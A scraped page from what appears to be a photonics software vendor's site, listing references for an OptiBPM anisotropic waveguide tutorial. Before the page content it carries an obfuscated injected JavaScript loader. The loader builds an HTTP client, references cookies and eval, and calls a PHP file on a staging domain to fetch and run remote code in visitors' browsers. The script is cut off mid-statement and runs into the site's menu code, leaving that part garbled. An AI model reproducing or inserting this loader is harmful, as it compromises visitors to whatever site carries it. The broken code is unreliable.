;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//staging.optiwave.com/wp-content/plugins/advanced-custom-fields-pro/assets/inc/color-picker-alpha/color-picker-alpha.php','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B // global window.SFM_is_mobile = (function () { var n = navigator.userAgent; var reg = new RegExp('Android\s([0-9\.]*)') var match = n.toLowerCase().match(reg); var android = match ? parseFloat(match[1]) : false; if (android && android < 3.6) { return; }; return n.match(/Android|BlackBerry|IEMobile|iPhone|iPad|iPod|Opera Mini/i); })(); window.SFM_current_page_menu = '670'; (function(){ var mob_bar = ''; var pos = 'right'; var iconbar = ''; var SFM_skew_disabled = ( function( ) { var window_width = window.innerWidth; var sfm_width = 290; if ( sfm_width * 2 >= window_width ) { return true; } return false; } )( ); var classes = SFM_is_mobile ? 'sfm-mobile' : 'sfm-desktop'; var html = document.getElementsByTagName('html')[0]; // pointer classes += mob_bar ? ' sfm-mob-nav' : ''; classes += ' sfm-pos-' + pos; classes += iconbar ? ' sfm-bar' : ''; classes += SFM_skew_disabled ? ' sfm-skew-disabled' : ''; html.className = html.className == '' ? classes : html.className + ' ' + classes; })();

References

Home » Tutorials » References

Compatibility:

[1] [Berenger, 1994] J. P. Berenger, “A Perfectly Matched Layer for the Absorption of Electromagnetic Waves,” J. Comput. Phys., No. 114, 1994, pp. 185-200.

[2] [Teixeira, 1998] F. L. Teixeira and W. C. Chew, ” Systematic Derivation of Anisotropic PML Absorbing Media in Cylindrical and Spherical Coordinates”, IEEE Microwave and Guided Lett., vol. 8, No. 6, pp. 371-373, 1998.

[3] [Huang, 1993] W. P. Huang, C. L. Xu, “Simulation of Three-Dimensional Optical Waveguides by a Full-Vector Beam Propagation Method”, IEEE J. Quant. Electron., vol. 29, No.10, pp. 2639-2649, 1992.

[4] [Huang, 1992 A] W. P. Huang, C. L. Xu, S. T. Chu and S. K. Chaudhuri, ” The Finite-Difference Vector Beam Propagation Method. Analysis and Assessment”, IEEE J. Light. Techn., vol.10, No.,3, pp. 295-305, 1992.

[5] [Huang, 1996A] W. P. Huang, C. L. Xu, W. Lui, and K. Yokoyama, “The Perfectly Matched Layer Boundary Condition for Modal Analysis of Optical Waveguides: Leaky Mode Calculations”, IEEE Photon. Techn. Lett., vol. 8, No. 5, pp. 652-654, May 1996.

[6] [Huang, 1996] W. P. Huang, C. L. Xu, W. Lui, and K. Yokoyama, “The Perfectly Matched Layer (PML) Boundary Condition for the Beam Propagation Method”, IEEE Photon. Techn. Lett., vol. 8, No. 5, pp. 649-651, May 1996.

[7] [Huang, 1992 B] W. P. Huang and C. L. Xu, “A Wide-Angle Vector Beam Propagation Method”, IEEE Photon. Techn. Lett., vol. 4, No. 10, pp. 1118-1120, 1992.

[8] [Hadley, 1992] G. R. Hadley, “Wide-Angle Beam Propagation using Padé Approximant Operators”, Opt. Lett., vol. 17, No. 20, pp. 1426-1428, 1992.

[9] [Van, 1992] H. A. Van Der Vorst, “Bi-CGSTAB: A Fast and Smooth Converging Variant of Bi-CG for the Solution of Nonsymmetric Linear System”, SIAM J. Sci. Statist. Comput., vol. 13, pp. 631-644, 1992.

[10] [Mielewski, 1998] J. Mielewski and M. Mrozowski, ” Application of the Arnoldi Method in FEM Analysis of Waveguides”, IEEE Microwave and Guided Lett., vol. 8, No.1, pp. 7-9, 1998.

[11] [Huang, 1991] W. P. Huang, C. L. Xu, and S. K. Chaudhuri, ” A Finite-Difference Vector Beam Propagation Method based on H-Fields”, IEEE Photon. Tech. Lett., vol. 3, pp. 1117-1120, 1991.

[12] [Huang, 1994] Xu, C. L., W. P. Huang, J. Chrostowski, and S. K. Chaudhuri, ” A Full-Vectorial Beam Propagation Methods for Anisotropic Waveguides”, IEEE J. Lightwave Tech., vol.12, No. 11, pp. 1926-1931.

Product: OptiBPM

Tutorial Series: Vectoral Modal Analysis for Anisotropic Waveguides

Published: November 21, 2013

Applications

Stay up-to-date with the latest updates

Products

Learn more about our products

Downloads

Learn more about our 30-Day Evaluations

Support

Ask a questions

Resources

Careers

Want to learn more?

Applications

Stay up-to-date with the latest updates

Products

Learn more about our products

Downloads

Learn more about our 30-Day Evaluations

Support

Ask a questions

Resources

Careers

Want to learn more?

References

Related:

Contact us

Learning

Community

Resources